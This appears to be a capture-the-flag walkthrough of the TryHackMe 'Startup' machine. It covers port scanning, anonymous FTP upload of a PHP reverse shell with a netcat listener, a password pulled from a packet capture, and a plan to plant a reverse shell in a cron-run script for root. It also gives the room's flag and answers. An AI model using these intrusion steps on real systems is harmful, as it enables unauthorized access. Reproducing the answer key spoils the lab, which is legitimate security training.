Create a directory for machine on the Desktop and a directory containing the scans with nmap.
Task 2 - Reconnaissance
su
echo "10.10.196.181 startup.thm" >> /etc/hosts
mkdir thm/startup.thm
cd thm/startup.thm
mkdir {nmap,content,exploits,scripts}
# At the end of the room
# To clean up the last line from the /etc/hosts file
sed -i '$ d' /etc/hosts
I prefer to start recon by pinging the target, this allows us to check connectivity and get OS info.
ping -c 3 startup.thm
PING startup.thm (10.10.196.181) 56(84) bytes of data.
64 bytes from startup.thm (10.10.196.181): icmp_seq=1 ttl=63 time=66.4 ms
64 bytes from startup.thm (10.10.196.181): icmp_seq=2 ttl=63 time=63.9 ms
64 bytes from startup.thm (10.10.196.181): icmp_seq=3 ttl=63 time=63.4 ms
Sending these three ICMP packets, we see that the Time To Live (TTL) is ~64 secs. this indicates that the target is a *nix, while Windows systems usually have a TTL of 128 secs.
2.1 - What is the secret spicy soup recipe?
Of course, start to check information scanning open ports:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-29 17:18 EDT
Initiating SYN Stealth Scan at 17:18
Scanning startup.thm (10.10.196.181) [65536 ports]
Discovered open port 22/tcp on 10.10.196.181
Discovered open port 21/tcp on 10.10.196.181
Discovered open port 80/tcp on 10.10.196.181
Completed SYN Stealth Scan at 17:18, 13.25s elapsed (65536 total ports)
Nmap scan report for startup.thm (10.10.196.181)
Host is up, received user-set (0.075s latency).
Scanned at 2023-07-29 17:18:18 EDT for 13s
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 63
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
command
result
sudo
run as root
sC
run default scripts
sV
enumerate versions
A
aggressive mode
T4
run a bit faster
oN
output to file with nmap formatting
It looks like there are 2 open ports on the machine: 21, 22, 80.
Now, we need to search which services are running on open ports:
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxrwx 2 65534 65534 4096 Nov 12 2020 ftp [NSE: writeable]
| -rw-r--r-- 1 0 0 251631 Nov 12 2020 important.jpg
|_-rw-r--r-- 1 0 0 208 Nov 12 2020 notice.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.9.80.228
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Maintenance
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Unix
We see that port 21 has anonymous login allowed with accessible files, jump in and get files!
cat notice.txt
Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus.
That's a pretty info, Maya can be an username!
Using gobuster we try to find hidden path
The best solution is to create a .php reverse shell and put in ftp folder via FTP
We copy php-reverse-shell.php just ready from php webshells folder
and start netcat on the same reverse shell port (444):
nc -lvnp 444
Now, we're in! Check flags here..
We see an interesting file "recipe.txt", and we find information that we need!
cat recipe.txt
Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was love.
love
Task 3 - What are the contents of user.txt?
We quickly try to find user.txt flag using find command:
find / -type f -iname user.txt 2>/dev/null
but we don't find anything! Then we need to explore files or escalate privileges
We notes an interesting dir called: incidents, with suspicious.pcapng (wireshark ext), we try to get it, but permission is denied!
Then, we can use netcat to open a new connection and transfer it:
We can analyze susp.pcap file using wireshark or strings:
strings susp.pcap
We see this psw: c4ntg3t3n0ughsp1c3 we can try to use it!
ssh lennie@startup.thm
lennie@startup.thm's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-190-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
44 packages can be updated.
30 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
$ ls
Documents scripts user.txt
$ cat user.txt
🚩 Flag 1 (user.txt)
THM{03ce3d619b80ccbfb3b7fc81e46c0e79}
Task 4 - What are the contents of root.txt?
We can continue to explore files:
ls -lah *
-rw-r--r-- 1 lennie lennie 38 Nov 12 2020 user.txt
Documents:
total 20K
drwxr-xr-x 2 lennie lennie 4.0K Nov 12 2020 .
drwx------ 5 lennie lennie 4.0K May 15 13:37 ..
-rw-r--r-- 1 root root 139 Nov 12 2020 concern.txt
-rw-r--r-- 1 root root 47 Nov 12 2020 list.txt
-rw-r--r-- 1 root root 101 Nov 12 2020 note.txt
scripts:
total 16K
drwxr-xr-x 2 root root 4.0K Nov 12 2020 .
drwx------ 5 lennie lennie 4.0K May 15 13:37 ..
-rwxr-xr-x 1 root root 77 Nov 12 2020 planner.sh
-rw-r--r-- 1 root root 1 May 15 13:38 startup_list.txt
cat scripts/*
cat Documents/*
cat /etc/print.sh
ls -lah /etc/print.sh
-rwx------ 1 lennie lennie 25 Nov 12 2020 /etc/print.sh
We see that planner.sh will be run as root (with a cron job), and use /etc/print.sh with lennie permission, we can modify it inserting a reverse shell as payload:
